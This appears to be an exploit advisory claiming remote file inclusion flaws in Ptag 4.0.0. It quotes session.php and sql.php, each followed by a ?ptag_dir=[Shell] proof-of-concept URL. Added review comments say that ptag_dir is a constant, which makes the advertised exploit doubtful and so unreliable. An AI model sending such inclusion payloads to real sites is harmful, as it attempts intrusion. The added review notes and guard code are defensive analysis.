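##################################################################
## Exploit Title: Ptag <= 4.0.0 Multiple RFI Exploit ##
## Date: 19-12-2009 ##
## Author: cr4wl3r ##
## Software Link: http://sourceforge.net/projects/ptag/ ##
## Version: N/A ##
## Tested on: GNU/LINUX ##
##################################################################

~ Code [session.php]

<?php
//Plottable Tagboard Systems Version 4.0.0 - ROLAND
//Session handling File

// NOTE(review): ptag_dir is read here as a constant, not as $ptag_dir. A
// query-string parameter fills $_GET (and, with register_globals on legacy
// PHP, a global variable); it never defines a constant. From the code on this
// page alone, the include path is therefore not set by ?ptag_dir=. Where
// ptag_dir is defined is not shown here -- confirm it is a fixed value and is
// never derived from the request.
//
// What a direct request to this file does cause: ptag_dir is undefined, so
// PHP < 8 falls back to the literal string 'ptag_dir' and the require fails
// with a fatal error (filesystem path disclosure when display_errors is on);
// PHP 8 throws an Error instead.
//
// The guard below is a review addition, not part of the quoted Ptag 4.0.0
// file. It stops the file from running unless the application has already
// defined ptag_dir.
if (!defined('ptag_dir')) {
    exit;
}

require_once(ptag_dir."lib/php/crossSession.php");

/**
 * Session handler for the tagboard, built on crossSession.
 *
 * Sets the SQL table name and the cookie name from the ptag_prefix constant
 * and hands the global $ptag_sql object to the parent constructor.
 */
class ptag_session extends crossSession{
    /**
     * Configure table and cookie names, then initialise the parent session.
     *
     * Reads the global $ptag_sql and the constants ptag_prefix and ptag_output.
     */
    public function __construct(){
        global $ptag_sql;
        $this -> sql_table = ptag_prefix."session";
        $this -> cookie_name = ptag_prefix."session";
        //If RSS mode, switch session to non-viewed tracker.
        // NOTE(review): sha1("") is a fixed value; what crossSession does with
        // this second argument is not visible on this page -- confirm.
        if (ptag_output == "rss"){
            parent::__construct($ptag_sql, sha1(""));
        }
        else{
            parent::__construct($ptag_sql);
        }
    }
}
?>

~ PoC [Ptag_path]/lib/session.php?ptag_dir=[Shell]

~ Code [sql.php]

<?php
//Plottable Tagboard Systems Version 4.0.0 - ROLAND
//Extending MySQL class

// NOTE(review): as in session.php, ptag_dir is a constant and is not populated
// by a ?ptag_dir= request parameter. The guard is a review addition, not part
// of the quoted Ptag 4.0.0 file; it blocks direct requests to this library
// file, which would otherwise end in a failed require.
if (!defined('ptag_dir')) {
    exit;
}

require_once(ptag_dir."lib/php/ezmySQL.php");

/**
 * MySQL wrapper for the tagboard, built on ezmySQL.
 *
 * Connects with the ptag_mysql_host, ptag_mysql_user, ptag_mysql_pass and
 * ptag_mysql_db constants.
 */
class ptag_sql extends ezmySQL{
    /**
     * Pass the connection constants to the ezmySQL constructor.
     */
    public function __construct(){
        parent::__construct(ptag_mysql_host, ptag_mysql_user, ptag_mysql_pass, ptag_mysql_db);
    }

    /**
     * Build an error message from a failed query and forward it to
     * ptag_exception::handle_error.
     *
     * @param array $err Reads the keys errno, error, query, line, file, class and method.
     * @return mixed Whatever ptag_exception::handle_error returns.
     */
    protected function error_handler($err){
        // NOTE(review): the message carries the raw query text. Whether it
        // reaches the browser depends on ptag_exception::handle_error, which is
        // not shown here -- confirm it is logged rather than echoed to the client.
        $error = "A MySQL error has occured: (".$err["errno"].") ".$err["error"]." when executing the query: ".$err["query"];
        return ptag_exception::handle_error($error, $err["line"], $err["file"], $err["class"], $err["method"]);
    }
}
?>

~ PoC [Ptag_path]/lib/sql.php?ptag_dir=[Shell]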